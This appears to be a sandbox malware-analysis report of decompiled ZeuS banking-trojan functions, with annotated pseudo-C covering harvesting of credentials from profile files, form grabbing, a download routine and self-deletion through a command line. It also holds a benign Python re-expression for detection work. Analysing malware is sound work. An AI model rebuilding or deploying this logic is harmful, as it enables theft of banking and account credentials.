					E0040F34A(_t54,  &_v88);
					_t56 = 0x69;
					E0040F34A(_t56,  &_v68);
					goto L6;
					L15:
					_t61 = E004060D2(_v8, 1); // advance to the next NUL-terminated section name
					_v8 = _t61;
					if(_t61 != 0) {
						_t83 = _v12;
						L6:
						// skip sections whose name contains either of two decoded strings (ids 0x65, 0x66), then read
						// three keys (ids 0x67, 0x68, 0x69) into adjacent 0xff-WCHAR slices of the 0xc08-byte buffer
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
								_t84 =  &(_t83[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
									_t26 =  &(_t84[0xff]); // 0x0
									_t94 = _t26;
									// the third value must pass E00413E04 before the section is kept
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E00413E04(_t81, _t94) > 0) {
										_t95 =  &_v144;
										_t72 = 0x56;
										E0040F34A(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t84[0xff]); // 0x0
										_push(_t84);
										_t85 = _v16;
										_t81 = 0x307;
										// format the three values with decoded string id 0x56 into the remaining 0x307 WCHARs
										// of the same buffer (0x604 total - 3 * 0xff)
										_t76 = E00405ED9(_t95, 0x307, _v16, _t95);
										_t97 = _t97 + 0x10;
										if(_t76 > 0) {
											_t96 = _a8;
											if(E004055DA(_t76, _t96, _t85) != 0) { // append the entry to the collection at _a8
												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1; // and bump its count
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E004051E6(_v12);
						_t86 = _v20;
						goto L17;
					}
				}
			}

APIs
  • GetPrivateProfileStringW.KERNEL32 ref: 00413FA6
    • Part of subcall function 004051B6: HeapAlloc.KERNEL32(00000008,-00000004,00406984,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051C7
  • StrStrIW.SHLWAPI(?,?), ref: 0041402E
  • StrStrIW.SHLWAPI(?,?), ref: 0041403F
  • GetPrivateProfileStringW.KERNEL32 ref: 0041405B
  • GetPrivateProfileStringW.KERNEL32 ref: 00414079
  • GetPrivateProfileStringW.KERNEL32 ref: 00414093
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: PrivateProfileString$AllocHeap
  • String ID:
  • API String ID: 2479592106-0
  • Opcode ID: 23dce95101567636ef4d146e7f727dadeab61daae526e19893cfd21531cf52d6
  • Instruction ID: 147e4022773acb23037d31fa521a8705d1120ce0d59bc311a6edd01bd2fe7ae5
  • Opcode Fuzzy Hash: 23dce95101567636ef4d146e7f727dadeab61daae526e19893cfd21531cf52d6
  • Instruction Fuzzy Hash: 90416332D0011ABBDF109BE68D05AEFBB79EF44754F104036BA04F7291DB39AE558B94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%
			E00411CFA(intOrPtr _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v60;
				char _v72;
				signed int _v76;
				char* _v80;
				void* _v96;
				intOrPtr _v148;
				void* _v160;
				char _v168;
				char _v272;
				char _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t128;
				intOrPtr* _t129;
				char* _t130;
				void* _t137;
				void* _t140;
				void* _t144;
				void* _t152;
				void* _t154;
				char* _t156;
				void* _t161;
				void* _t163;
				void* _t164;
				void* _t167;
				void* _t172;
				intOrPtr _t174;
				intOrPtr* _t176;
				void* _t177;
				void* _t182;
				intOrPtr _t186;
				intOrPtr _t187;
				signed int _t189;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t199;
				int _t204;
				void* _t207;
				signed int _t210;
				void* _t214;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t224;
				char* _t227;
				intOrPtr _t228;
				char* _t233;
				char* _t236;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t244;
				void* _t247;

				_t217 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x4233fc);
				_t225 =  *0x423418;
				if( *0x423418 == 0 ||  *0x423414 == 0) {
					_t240 = _a4;
				} else {
					_t240 = _a4;
					_t230 = 0;
					if(E0041142F(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
						_t210 = E0041D77E();
						_v20 = _t210;
						if(_t210 != 0) {
							_t214 = E004114E9(0, 4,  &_v20,  *0x423414);
							_push(_v20);
							if(_t214 == 0) {
								E004051E6();
							}
							E0041D7E9(_t225);
						}
						E004051E6( *0x423414);
						E004051E6( *0x423418);
						 *0x423414 = _t217;
						 *0x423418 = _t217;
					}
				}
				LeaveCriticalSection(0x4233fc);
				_t128 =  *((intOrPtr*)(_t240 + 0x40));
				_t254 = _t128 - _t217;
				if(_t128 == _t217) {
					L38:
					if((_v16 & 0x00000001) == 0) {
						_t187 =  *((intOrPtr*)(_t240 + 0x44));
						_t272 = _t187 - _t217;
						if(_t187 != _t217 && E004116EA(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
							_v16 = _v16 | 0x00000001;
						}
					}
					if( *(_t240 + 0x20) >= 0x21) {
						_t182 = 0x10;
						E0040F314(_t182,  &_v72);
						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
						if(E00405257( &_v72, _t238, 0x21) == 0) {
							_t186 =  *((intOrPtr*)(_t238 + 0x21));
							if(_t186 == 0x3b || _t186 == 0) { // ';' or end of string after the 0x21-char match
								_v16 = _v16 | 0x00000010;
							}
						}
					}
					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
					_v24 = _t217;
					if(_t129 == _t217 ||  *_t129 == _t217) {
						L52:
						_t130 =  *((intOrPtr*)(_t240 + 0x34));
						__eflags = _t130 - _t217;
						if(_t130 == _t217) {
							goto L60;
						}
						__eflags =  *_t130;
						if( *_t130 == 0) {
							goto L60;
						}
						_t167 = 0x12;
						E0040F34A(_t167,  &_v168);
						_t172 = E00405F54( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
						_t247 = _t247 + 0xc;
						goto L55;
					} else {
						_t176 =  *((intOrPtr*)(_t240 + 0x30));
						if(_t176 == _t217 ||  *_t176 == _t217) {
							goto L52;
						} else {
							_t177 = 0x11;
							E0040F34A(_t177,  &_v272);
							_push( *((intOrPtr*)(_a4 + 0x30)));
							_t172 = E00405F54( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
							_t247 = _t247 + 0x10;
							L55:
							if(_t172 > _t217) {
								_t174 = E00406595(_v24, _t172 + _t172);
								if( *0x42341c != _t174) {
									_t64 =  &_v16;
									 *_t64 = _v16 | 0x00000020;
									__eflags =  *_t64;
									 *0x42341c = _t174;
								} else {
									E004051E6(_v24);
									_v24 = _t217;
								}
							}
							_t240 = _a4;
							L60:
							if(_v9 != 0xff) {
								__eflags = _v9 - 1;
								if(_v9 != 1) {
									L67:
									if((_v16 & 0x00000008) == 0) {
										L93:
										E004051E6(_v24);
										_t218 = _v16;
										if((_t218 & 0x00000001) == 0) {
											if(E00411752(_t230, _t240) != 0) {
												_t218 = _t218 | 0x00000002;
											}
											if((_t218 & 0x00000010) != 0 && E00411B0C(_t240, _t230) != 0) {
												_t218 = _t218 | 0x00000004;
											}
										}
										return _t218;
									}
									_t136 =  *(_t240 + 0x28);
									_t219 = 0;
									if( *(_t240 + 0x28) != 0) {
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) == 0) {
											__eflags =  *(_t240 + 0x20);
											if( *(_t240 + 0x20) != 0) {
												L92:
												_v16 = _v16 & 0xfffffff7;
												goto L93;
											}
											_t233 =  &_v36;
											_t137 = 0xc;
											E0040F314(_t137, _t233);
											_push(_t233);
											_push(9);
											L81:
											_pop(_t140);
											_v20 = E00405644(_t140);
											L82:
											if(_v20 == 0) {
												goto L92;
											}
											E00404CEF( &_v32);
											_t144 = E00405426( *(_t240 + 0xc), 0,  *(_t240 + 8));
											_t235 = _t144;
											if(_t144 != 0) {
												_t230 = 0x3c; // sizeof(URL_COMPONENTSA)
												E00405299( &_v160,  &_v160, 0, _t230);
												_v160 = _t230; // dwStructSize
												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
													_t152 = 0xa;
													E0040F34A(_t152,  &_v272);
													_t154 = 0xd;
													E0040F34A(_t154,  &_v60);
													_t227 =  *(_a4 + 0x10);
													_t156 = 0x4030e8;
													_t230 =  ==  ? 0x4030e8 : _v24;
													_t244 =  ==  ? 0x4030e8 : _v32;
													if(_t227 == 0) {
														_t227 = "-";
													}
													if((_v16 & 0x00000001) != 0) {
														_t156 =  &_v60;
													}
													_push(_v20);
													_push(_t230);
													_push(_t244);
													_push(_t227);
													_push(_t156);
													// _v148 is nScheme of the cracked URL: INTERNET_SCHEME_HTTPS (4) selects type 0xc, anything else 0xb
													_t161 = E00418864(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
													_t240 = _a4;
													_t219 = _t161;
												}
												E004051E6(_t235);
											}
											E004051E6(_v32);
											E004051E6(_v20);
											if(_t219 != 0) {
												goto L93;
											} else {
												goto L92;
											}
										}
										_t230 = E00405644(_t136,  *((intOrPtr*)(_t240 + 0x24)));
										_v20 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											goto L92;
										}
										_t163 = 0;
										__eflags =  *(_t240 + 0x28);
										if( *(_t240 + 0x28) <= 0) {
											goto L82;
										} else {
											goto L73;
										}
										do {
											L73:
											_t228 =  *((intOrPtr*)(_t163 + _t230));
											__eflags = _t228 - 0x26;
											if(_t228 != 0x26) { // '&'
												__eflags = _t228 - 0x2b;
												if(_t228 == 0x2b) { // '+'
													 *((char*)(_t163 + _t230)) = 0x20; // ' '
												}
											} else {
												 *((char*)(_t163 + _t230)) = 0xa; // '\n': each '&'-separated form field ends up on its own line
											}
											}
											_t163 = _t163 + 1;
											__eflags = _t163 -  *(_t240 + 0x28);
										} while (_t163 <  *(_t240 + 0x28));
										goto L82;
									}
									_t236 =  &_v36;
									_t164 = 0xb;
									E0040F314(_t164, _t236);
									_push(_t236);
									_push(7);
									goto L81;
								}
								L66:
								_v16 = _v16 | 0x00000008;
								goto L67;
							}
							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
								if((_v16 & 0x00000020) == 0) {
									goto L67;
								}
							}
							goto L66;
						}
					}
				}
				_t189 = E0040AD5E( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
				_t225 = _v32;
				_v20 = _t189;
				if(E00406078(_t189, _v32) == 0) {
					L37:
					E004051E6(_v20);
					_t217 = 0;
					goto L38;
				} else {
					_t239 = _v20;
					do {
						_t225 = _t239 + 1;
						if( *_t225 == 0) {
							goto L36;
						}
						_t194 =  *_t239;
						if(_t194 == 0x21) { // '!' prefix on the mask entry
							L22:
							_t239 = _t225;
							L23:
							_t230 = 0;
							_t225 = _t239;
							if(E0041142F(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
								goto L36;
							}
							_t197 = _t224;
							if(_t197 == 0) {
								_v9 = 0;
								L35:
								if(_t224 != 2) {
									goto L37;
								}
								goto L36;
							}
							_t198 = _t197 - 1;
							if(_t198 == 0) {
								L30:
								_v9 = 1;
								goto L35;
							}
							_t199 = _t198 - 1;
							if(_t199 == 0) {
								_t230 = 0x3c; // sizeof(URL_COMPONENTSA)
								E00405299( &_v96,  &_v96, 0, 0);
								_v80 =  &_v536; // lpszHostName -> 0x103-byte stack buffer
								_v96 = 0;
								_v76 = 0x103; // dwHostNameLength
								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
								__eflags = _t204 - 1;
								if(_t204 == 1) {
									__eflags = _v76;
									if(_v76 > 0) { // a host name was cracked out of the URL
										E00404CA9( &_v536);
									}
								}
								goto L35;
							}
							_t207 = _t199 - 1;
							if(_t207 == 0 || _t207 == 1) {
								_v16 = _v16 | 0x00000001;
								goto L30;
							} else {
								goto L35;
							}
						}
						if(_t194 == 0x2d) { // '-'
							goto L22;
						}
						if(_t194 == 0x40) { // '@'
							goto L22;
						}
						if(_t194 == 0x5e) { // '^'
							_t224 = 4;
							goto L22;
						} else {
							_t224 = 0;
							goto L23;
						}
						L36:
						_t239 = E004060B6(_t239, 1);
					} while (_t239 != 0);
					goto L37;
				}
			}

APIs
  • EnterCriticalSection.KERNEL32(004233FC,-004233F0,00000000,004233D4), ref: 00411D15
  • LeaveCriticalSection.KERNEL32(004233FC), ref: 00411D98
  • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00411E63
  • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041209D
    • Part of subcall function 0041D77E: CreateMutexW.KERNEL32(004239E8,00000000,00423FC8,004233FC,?,?,00411D46,00000000,00000000), ref: 0041D7A6
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
  • String ID:
  • API String ID: 4018265435-3916222277
  • Opcode ID: 87b26a5b7c153a221f951eb55c3b02f7f62683af5ab9cce4bb3c2e99aae10f8e
  • Instruction ID: 6857271f464a13cd1d597af27affdfde325de2ef6da90c031825e68885fd58da
  • Opcode Fuzzy Hash: 87b26a5b7c153a221f951eb55c3b02f7f62683af5ab9cce4bb3c2e99aae10f8e
  • Instruction Fuzzy Hash: A1D1D231A00705AEDF219BA1C941BEF7BB5EF04304F44846BEA41A72A1D77C9EC2CB59
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%
			E0040CAB3(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				void* _t34;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t56;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_push(_t56);
				// E0041CC9C builds a path with a ".dat" extension (see PathRenameExtensionW in its API list);
				// PathRemoveFileSpecW then strips the file name, leaving the directory that holds it
				_t50 =  &_v1668;
				E0041CC9C(__ecx, _t50, _t56, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E0041CC9C(_t46, _t51, PathRemoveFileSpecW, 2);
				PathRemoveFileSpecW(_t51);
				 *0x4239b0 =  *0x4239b0 | 0x00000002;
				_push(0);
				E0040C041();
				E0041BE9C(_t46, _t65); // SHDeleteValueW under HKCU, Sleep(0x1f4 = 500 ms), RegOpenKeyExW (see API list)
				// directory removal routine: FindFirstFileW/FindNextFileW walk, SetFileAttributesW(0x80 = FILE_ATTRIBUTE_NORMAL), RemoveDirectoryW
				E0040A860( &_v1680, _t65);
				E0040A860(_t51, _t65);
				_t52 =  &_v2720;
				E0041CC9C(_t51, _t52, PathRemoveFileSpecW, 3);
				SHDeleteKeyW(0x80000001, _t52); // 0x80000001 = HKEY_CURRENT_USER
				// convert both directory paths to the OEM code page so they can be placed on a command line
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				_t34 = 7;
				E0040F314(_t34,  &_v3072); // decoded string id 7 is the command-line format
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				// format both OEM paths into a 0x474-char command line and hand it to E00406CA6,
				// which resolves %ComSpec% (see its API list) to run it
				if(E00405F1D( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E00406CA6(__ebx, 0x474,  &_v1168);
				}
				if( *0x423e78 == 0xffffffff) {
					ExitProcess(0); // only when the global at 0x423e78 is -1
				}
				}
				return 1;
			}

APIs
    • Part of subcall function 0041CC9C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423A10,00000032,77E49EB0,?,00000000), ref: 0041CD17
  • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 0040CAD8
  • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0040CAEB
    • Part of subcall function 0040C041: SetEvent.KERNEL32(0040CAFB,00000000), ref: 0040C047
    • Part of subcall function 0040C041: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040C05A
    • Part of subcall function 0041BE9C: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,750D46D0), ref: 0041BED9
    • Part of subcall function 0041BE9C: Sleep.KERNEL32(000001F4), ref: 0041BEE8
    • Part of subcall function 0041BE9C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0041BEFE
    • Part of subcall function 0040A860: FindFirstFileW.KERNEL32(?,?,?), ref: 0040A891
    • Part of subcall function 0040A860: FindNextFileW.KERNEL32(00000000,?), ref: 0040A8EC
    • Part of subcall function 0040A860: FindClose.KERNEL32(00000000), ref: 0040A8F7
    • Part of subcall function 0040A860: SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040A903
    • Part of subcall function 0040A860: RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040A90A
  • SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0040CB29
  • CharToOemW.USER32 ref: 0040CB45
  • CharToOemW.USER32 ref: 0040CB54
  • ExitProcess.KERNEL32 ref: 0040CBAA
    • Part of subcall function 00406CA6: CharToOemW.USER32 ref: 00406CD6
    • Part of subcall function 00406CA6: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00406D5A
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
  • String ID:
  • API String ID: 1572960351-0
  • Opcode ID: 84b4974f0afceff20669f4bc2495a6b390239d4bba102a39793c8cc330070334
  • Instruction ID: 5cf385416a9cc1a2a6bc46bbfad114d14fe76df5a1596ce88dd065d0d8ab4de7
  • Opcode Fuzzy Hash: 84b4974f0afceff20669f4bc2495a6b390239d4bba102a39793c8cc330070334
  • Instruction Fuzzy Hash: 3A21A4725083449BD230FB65DC46FDB77ACEB84314F04492BB548E7191DB78A505CBDA
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00407028(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				// GENERIC_WRITE, FILE_SHARE_READ, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E004051B6(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) { // not a clean end of stream: hand the path back to E0040A548
						E0040A548(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				// read 0x1000-byte chunks until the optional stop event _a16 is signalled (0x102 = WAIT_TIMEOUT means "not yet")
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) { // zero bytes read: end of response, the only path that sets the success flag
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37; // running byte count
					if(_v16 <= _a12) { // size cap _a12 is checked after the chunk is already on disk
						continue;
					}
					break; // over the cap: leave with _v5 still 0
				}
				E004051E6(_v20);
				goto L13;
			}

APIs
  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00407048
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 00407076
  • InternetReadFile.WININET(00001000,?,00001000,?), ref: 00407092
  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004070AD
  • FlushFileBuffers.KERNEL32(00000000), ref: 004070CD
  • CloseHandle.KERNEL32(00000000), ref: 004070E0
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
  • String ID:
  • API String ID: 3509176705-0
  • Opcode ID: b599e8e0629d27dd6a9138bd500c00c4b82d30f9c3d647bf3e9d8a9aacd13cef
  • Instruction ID: 21b0d861f39a0add10b6e9b01f5aebf11b8a2428febc8b3b58e12b2323c8b79d
  • Opcode Fuzzy Hash: b599e8e0629d27dd6a9138bd500c00c4b82d30f9c3d647bf3e9d8a9aacd13cef
  • Instruction Fuzzy Hash: 72219D30D08209BFDF119FA0DC84BAF7B79AB04314F10817AF611B52E0C7399D409B2A
Uniqueness

Uniqueness Score: -1.00%
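
The control flow of E00407028 above is easy to misread at the cap boundary, so here is an added Python re-expression of it (example code written for this page, not the sample's own code). It keeps the decompiled loop's decisions in the same order: a stop check before every read, success only on a zero-length read, the running total compared with the cap only after the chunk has been written. An in-memory reader stands in for InternetReadFile; the file is opened with the same create-always semantics; and it assumes that E0040A548 removes the partial file on failure, which the page shows only as a call with the path when the success flag is clear.

```python
import io
import os
import tempfile

CHUNK = 0x1000        # InternetReadFile buffer size the sample allocates (E004051B6(0x1000))
WAIT_TIMEOUT = 0x102  # WaitForSingleObject result the sample's loop treats as "keep going"


def stream_to_file(read_chunk, path, max_size, is_cancelled=None):
    """Mirror of the E00407028 loop (added example, not the sample's code).

    read_chunk(n) -> bytes: stands in for InternetReadFile; b'' means end of stream,
                            None means the read call failed.
    is_cancelled() -> bool: stands in for WaitForSingleObject(_a16, 0) != WAIT_TIMEOUT.
    Returns True only when the stream ended cleanly (the _v5 == 1 path).
    """
    ok = False
    total = 0
    with open(path, "wb") as fh:  # CreateFileW(GENERIC_WRITE, FILE_SHARE_READ, CREATE_ALWAYS)
        while is_cancelled is None or not is_cancelled():
            chunk = read_chunk(CHUNK)
            if chunk is None:          # InternetReadFile returned FALSE
                break
            if len(chunk) == 0:        # zero bytes read: clean end of stream
                fh.flush()             # FlushFileBuffers
                ok = True
                break
            fh.write(chunk)            # WriteFile (a short write also breaks in the sample)
            total += len(chunk)
            if total > max_size:       # cap is checked only after the chunk is on disk
                break
    if not ok:
        # Assumption: E0040A548(_a8) deletes the partial file. The page shows only that
        # it is called with the path when the success flag is clear.
        os.unlink(path)
    return ok


def make_reader(data):
    """Constructed in-memory stand-in for an InternetReadFile handle."""
    buf = io.BytesIO(data)
    return lambda n: buf.read(n)


def demo(data, max_size, cancel_after_reads=None):
    """Run stream_to_file on constructed bytes; returns (ok, file_exists, bytes_on_disk)."""
    reads = [0]
    reader = make_reader(data)

    def counted_read(n):
        reads[0] += 1
        return reader(n)

    def cancelled():
        # models the stop event being signalled after a given number of reads
        return cancel_after_reads is not None and reads[0] >= cancel_after_reads

    fd, path = tempfile.mkstemp()
    os.close(fd)
    ok = stream_to_file(counted_read, path, max_size, cancelled)
    exists = os.path.exists(path)
    size = os.path.getsize(path) if exists else 0
    if exists:
        os.unlink(path)
    return ok, exists, size


if __name__ == "__main__":
    print("exactly at cap:", demo(b"A" * 0x1000, 0x1000))
    print("one byte over cap:", demo(b"A" * (0x1000 + 1), 0x1000))
    print("stop event after first read:", demo(b"A" * 0x2000, 0x10000, cancel_after_reads=1))
```

Two behaviours worth noting for anyone writing detection or replaying the download: a response of exactly max_size bytes is accepted, one byte more is not, and because the test happens after WriteFile the file briefly exceeds the cap on disk before the failure path runs. A signalled stop event likewise leaves the success flag clear, so it lands on the same E0040A548 path as an oversized response.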

C-Code - Quality: 92%
			E00409922(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					// 0x84 = WM_NCHITTEST with lParam = MAKELONG(x, y), flags 2 = SMTO_ABORTIFHUNG, timeout _v20 ms
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) { // HTTRANSPARENT
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							// the window said HTTRANSPARENT: set WS_DISABLED (0x08000000) via GWL_STYLE (-16) so that
							// WindowFromPoint ignores it, recurse to find the window beneath, then restore the style
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E00409922(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

APIs
  • WindowFromPoint.USER32(?,?), ref: 0040993E
  • SendMessageTimeoutW.USER32 ref: 0040996F
  • GetWindowLongW.USER32(00000000,000000F0), ref: 00409993
  • SetWindowLongW.USER32 ref: 004099A4
  • GetWindowLongW.USER32(?,000000F0), ref: 004099C1
  • SetWindowLongW.USER32 ref: 004099CF
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Window$Long$FromMessagePointSendTimeout
  • String ID:
  • API String ID: 2645164282-0
  • Opcode ID: dce1cf5a15b1546a4c5bdbbdc19d40005f9222d868c2999854deafd93e8116fc
  • Instruction ID: fbb239f87f6728597af5ead3176ec19b808993276fa075f5a650eeadcb783ca4
  • Opcode Fuzzy Hash: dce1cf5a15b1546a4c5bdbbdc19d40005f9222d868c2999854deafd93e8116fc
  • Instruction Fuzzy Hash: 3021A4B1509216ABD7109F658C80E6B7B98EB84330F20472AB9B1A23E2D674DD049B95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
			E0040A402(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				// GENERIC_READ, share mode derived from the caller's flags in __eax, OPEN_EXISTING
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) { // size query failed, or high dword set (file >= 4 GiB): reject
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4); // MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
